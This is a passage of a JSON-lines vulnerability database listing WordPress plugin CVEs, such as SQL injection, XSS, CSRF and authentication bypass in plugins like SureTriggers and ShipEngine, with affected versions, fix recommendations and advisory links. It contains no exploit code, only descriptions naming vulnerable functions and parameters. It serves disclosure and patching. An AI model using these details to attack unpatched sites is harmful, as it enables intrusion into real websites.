version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/794bc5cd-c9ac-4583-ae3d-a92361374b5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/794bc5cd-c9ac-4583-ae3d-a92361374b5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-static-content\\\/tags\\\/1.0.8\\\/includes\\\/class-mas-static-content-shortcodes.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-static-content\\\/tags\\\/1.0.8\\\/includes\\\/class-mas-static-content-shortcodes.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151679%40mas-static-content&new=3151679%40mas-static-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151679%40mas-static-content&new=3151679%40mas-static-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0791","slug":"bulk-editor","versionImpact":"1.0.8.1","versionEndExcluding":"1.0.8.2","description":"The WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to unauthorized access, modification or loss of data due to a missing capability check on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions in all versions up to, and including, 1.0.8.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create, delete or modify taxonomy terms.","recommendation":"Update to version 1.0.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13c66a8f-b35f-4943-8880-0799b0d150f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0790","slug":"bulk-editor","versionImpact":"1.0.8.1","versionEndExcluding":"1.0.8.2","description":"The WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8.1. This is due to missing or incorrect nonce validation on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions. This makes it possible for unauthenticated attackers to create, modify and delete taxonomy terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Furthermore, the functions wpbe_save_options, wpbe_bulk_delete_posts_count, wpbe_bulk_delete_posts, and wpbe_save_meta are vulnerable to Cross-Site Request Forgery allowing for plugin options update, post count deletion, post deletion and modification of post metadata via forged request.","recommendation":"Update to version 1.0.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-editor\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13531","slug":"shipengine-shipping-quotes","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The ShipEngine Shipping Quotes plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 1.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shipengine-shipping-quotes\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shipengine-shipping-quotes\\\/trunk\\\/admin\\\/tab\\\/shipping-rules\\\/shipping-rules-save.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb7bdcf-9f93-4c86-a4b3-ad5aaf7521b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbb7bdcf-9f93-4c86-a4b3-ad5aaf7521b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4661","slug":"woo-products-widgets-for-elementor","versionEndExcluding":"1.0.8","description":"The Widgets for WooCommerce Products on Elementor WordPress plugin before 1.0.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95956c9-40e5-47aa-86f6-e2da61b3c19f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b95956c9-40e5-47aa-86f6-e2da61b3c19f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11896","slug":"ai-content","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The Text Prompter \u2013 Unlimited chatgpt text prompts for openai tasks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'text_prompter' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212197%40ai-content&new=3212197%40ai-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212197%40ai-content&new=3212197%40ai-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165f988d-ec6d-44f7-8884-23aedc2fcb08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165f988d-ec6d-44f7-8884-23aedc2fcb08?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12423","slug":"cf7-redirect-thank-you-page","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The Contact Form 7 Redirect & Thank You Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-redirect-thank-you-page\\\/tags\\\/1.0.7\\\/includes\\\/admin\\\/tabs_page.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-redirect-thank-you-page\\\/tags\\\/1.0.7\\\/includes\\\/admin\\\/tabs_page.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3220810%40cf7-redirect-thank-you-page&new=3220810%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=#file19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3220810%40cf7-redirect-thank-you-page&new=3220810%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=#file19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d67965c-f8f3-4868-a261-81cfc80dbcb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d67965c-f8f3-4868-a261-81cfc80dbcb3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5599","slug":"fileorganizer","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The FileOrganizer \u2013 Manage WordPress and Website Files plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.7 via the 'fileorganizer_ajax_handler' function. This makes it possible for unauthenticated attackers to extract sensitive data including backups or other sensitive information if the files have been moved to the built-in Trash folder.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e7b65d-91f8-477e-b992-3148c1b65d7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e7b65d-91f8-477e-b992-3148c1b65d7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fileorganizer\\\/trunk\\\/main\\\/ajax.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098763\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098763\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5204","slug":"swiss-toolkit-for-wp","versionImpact":"1.0.7","versionEndExcluding":"1.0.8","description":"The Swiss Toolkit For WP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.7. This is due to the plugin storing custom data in post metadata without an underscore prefix. This makes it possible for authenticated attackers with contributor-level and above permissions to log in as any existing user on the site, such as an administrator.","recommendation":"Update to version 1.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8526106-847a-420f-9275-f759a8dd4dfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8526106-847a-420f-9275-f759a8dd4dfb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swiss-toolkit-for-wp\\\/trunk\\\/includes\\\/plugins\\\/class-boomdevs-swiss-toolkit-generate-login-url.php?rev=3077000#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swiss-toolkit-for-wp\\\/trunk\\\/includes\\\/plugins\\\/class-boomdevs-swiss-toolkit-generate-login-url.php?rev=3077000#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091913\\\/swiss-toolkit-for-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091913\\\/swiss-toolkit-for-wp\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3720","slug":"upload-media-by-url","versionEndExcluding":"1.0.8","description":"The Upload Media By URL WordPress plugin before 1.0.8 does not have CSRF check when uploading files, which could allow attackers to make logged in admins upload files (including HTML containing JS code for users with the unfiltered_html capability) on their behalf.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16375a7f-0a9f-4961-8510-d047ffbf3954\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16375a7f-0a9f-4961-8510-d047ffbf3954\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3102","slug":"suretriggers","versionImpact":"1.0.78","versionEndExcluding":"1.0.79","description":"The SureTriggers: All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_user' function in all versions up to, and including, 1.0.78. This makes it possible for unauthenticated attackers to create administrator accounts on the target website when the plugin is installed and activated but not configured with an API key.","recommendation":"Update to version 1.0.79, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suretriggers\\\/trunk\\\/src\\\/Controllers\\\/RestController.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/suretriggers\\\/trunk\\\/src\\\/Controllers\\\/RestController.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8854","slug":"cp-polls","versionImpact":"1.0.76","versionEndExcluding":"1.0.77","description":"The Polls CP WordPress plugin before 1.0.77 does not sanitise and escape some of its poll settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multi site setup).","recommendation":"Update to version 1.0.77, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bffe0f75-33a2-4270-af13-835b8eb65688\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bffe0f75-33a2-4270-af13-835b8eb65688\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8851","slug":"cp-polls","versionImpact":"1.0.76","versionEndExcluding":"1.0.77","description":"The Polls CP WordPress plugin before 1.0.77 does not sanitise and escape some of its poll settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multi site setup).","recommendation":"Update to version 1.0.77, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/493f3360-3155-4105-9b5c-60a8605275ab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/493f3360-3155-4105-9b5c-60a8605275ab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6219","slug":"bookingpress-appointment-booking","versionEndExcluding":"1.0.77","description":"The BookingPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'bookingpress_process_upload' function in versions up to, and including, 1.0.76. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710b8e4e-01de-4e99-8cf2-31abc2419b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/710b8e4e-01de-4e99-8cf2-31abc2419b29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/tags\\\/1.0.76\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/tags\\\/1.0.76\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3001484\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress_fileupload_class.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0037","slug":"wd-google-maps","versionEndExcluding":"1.0.73","description":"The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ab1fe2-6611-4f43-91ba-52c56f02ed56\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33ab1fe2-6611-4f43-91ba-52c56f02ed56\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wd-google-maps_1-0-72_1\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/wd-google-maps_1-0-72_1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4758","slug":"wd-google-maps","versionEndExcluding":"1.0.72","description":"The 10WebMapBuilder WordPress plugin before 1.0.72 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c89234-5e9c-47c8-9827-8ab0b10fb7d6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c89234-5e9c-47c8-9827-8ab0b10fb7d6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46152","slug":"bulk-editor","versionImpact":"1.0.7.1","versionEndExcluding":"1.0.7.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.7.1 versions.","recommendation":"Update to version 1.0.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-44990","slug":"bulk-editor","versionImpact":"1.0.7.1","versionEndExcluding":"1.0.7.2","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.7.1 versions.","recommendation":"Update to version 1.0.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-plugin-1-0-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34028","slug":"bulk-editor","versionEndExcluding":"1.0.7.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOLF \u2013 WordPress Posts Bulk Editor and Manager Professional plugin <=\u00a01.0.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bulk-editor\\\/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22139","slug":"wp-manutencao","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"Authentication Bypass by Spoofing vulnerability in Filipe Seabra WordPress Manuten\u00e7\u00e3o allows Functionality Bypass.This issue affects WordPress Manuten\u00e7\u00e3o: from n\/a through 1.0.6.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-manutencao\\\/wordpress-wordpress-manutencao-plugin-1-0-6-bypass-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-manutencao\\\/wordpress-wordpress-manutencao-plugin-1-0-6-bypass-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12177","slug":"ai-image-alt-text-generator-for-wp","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Ai Image Alt Text Generator for WP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-alt-text-generator-for-wp\\\/tags\\\/1.0.2\\\/includes\\\/class-boomdevs-ai-image-alt-text-generator-custom-menu.php#L218\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-image-alt-text-generator-for-wp\\\/tags\\\/1.0.2\\\/includes\\\/class-boomdevs-ai-image-alt-text-generator-custom-menu.php#L218\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/902ec583-c072-4c6d-8250-ad08d7ecf239?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/902ec583-c072-4c6d-8250-ad08d7ecf239?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10685","slug":"cf7-redirect-thank-you-page","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Contact Form 7 Redirect & Thank You Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f52285e0-e78d-4231-8ff9-53fbe568fcc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f52285e0-e78d-4231-8ff9-53fbe568fcc2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184638%40cf7-redirect-thank-you-page&new=3184638%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184638%40cf7-redirect-thank-you-page&new=3184638%40cf7-redirect-thank-you-page&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11760","slug":"currency-converter-widget-pro","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The Currency Converter Widget ? PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'currency-converter-widget-pro' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206549%40currency-converter-widget-pro&new=3206549%40currency-converter-widget-pro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206549%40currency-converter-widget-pro&new=3206549%40currency-converter-widget-pro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f9a0341-5479-4b83-8ce8-eb838a34a448?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f9a0341-5479-4b83-8ce8-eb838a34a448?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2324","slug":"fileorganizer","versionImpact":"1.0.6","versionEndExcluding":"1.0.7","description":"The FileOrganizer \u2013 Manage WordPress and Website Files plugin for WordPress is vulnerable to Stored Cross-Site Scripting via svg file upload in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. For the free version, this is limited to administrators. The pro version is also vulnerable and exploitable by administrators, but also offers the functionality to lower level users (as low as subscribers) if enabled.","recommendation":"Update to version 1.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffaefd79-57a7-43b8-af1c-e108567eba67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffaefd79-57a7-43b8-af1c-e108567eba67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069064%40fileorganizer%2Ftrunk&old=3010587%40fileorganizer%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069064%40fileorganizer%2Ftrunk&old=3010587%40fileorganizer%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
